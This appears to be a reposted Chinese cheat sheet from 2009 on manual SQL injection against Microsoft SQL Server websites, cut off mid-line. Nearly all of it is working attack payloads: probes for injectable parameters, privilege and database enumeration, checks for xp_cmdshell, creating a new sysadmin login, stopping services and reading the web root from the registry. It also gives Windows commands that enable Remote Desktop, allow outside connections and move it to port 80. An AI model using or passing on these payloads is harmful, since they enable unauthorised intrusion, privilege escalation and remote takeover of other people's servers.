手工注入mysql.docVIP

手工MSSQL注入常用SQL语句 来源：转载作者：佚名时间：2009-08-18 21:59:51 and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //当前数据库名and 1=(select @@servername) //本地服务名and 1=(select IS_SRVROLEMEMBER(sysadmin)) //判断是否是系统管理员and 1=(Select IS_MEMBER(db_owner)) //判断是否是库权限and 1= (Select HAS_DBACCESS(master)) //判断是否有库读取权限and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1，2，3....;declare @d int //是否支持多行and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = X AND name = xp_cmdshell) //判断XP_CMDSHELL是否存在and 1=(select count(*) FROM master.dbo.sysobjects where name= xp_regread) //查看XP_regread扩展存储过程是不是已经被删除添加和删除一个SA权限的用户test：（需要SA权限）exec master.dbo.sp_addlogin test,passwordexec master.dbo.sp_addsrvrolemember test,sysadmin停掉或激活某个服务。 （需要SA权限）exec master..xp_servicecontrol stop,scheduleexec master..xp_servicecontrol start,schedule暴网站目录create table labeng(lala nvarchar(255), id int)DECLARE @result varchar(255) EXEC master.dbo.xp_regread HKEY_LOCAL_MACHINE,SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots,/,@result output insert into labeng(lala) values(@result);and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala1)—————————————————————————————————————————————————————分割DOS下开3389 并修改端口号sc config termservice start= autonet start termservice//允许外连reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0x0 /f//该3389端口到80reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 80 /f SQL Server 判断是否可注射： /article.asp?id=6 /article.asp?id=6 /article.asp?id=6 and 1=1 /article.asp?id=6 and 1=2 /article.asp?action=value and 1=1 /article.asp?action=value and 1=2 searchpoints% and 1=1 searchpoints% and 1=2 确定数据库类型： /article.asp?id=6 and user0 /article.asp?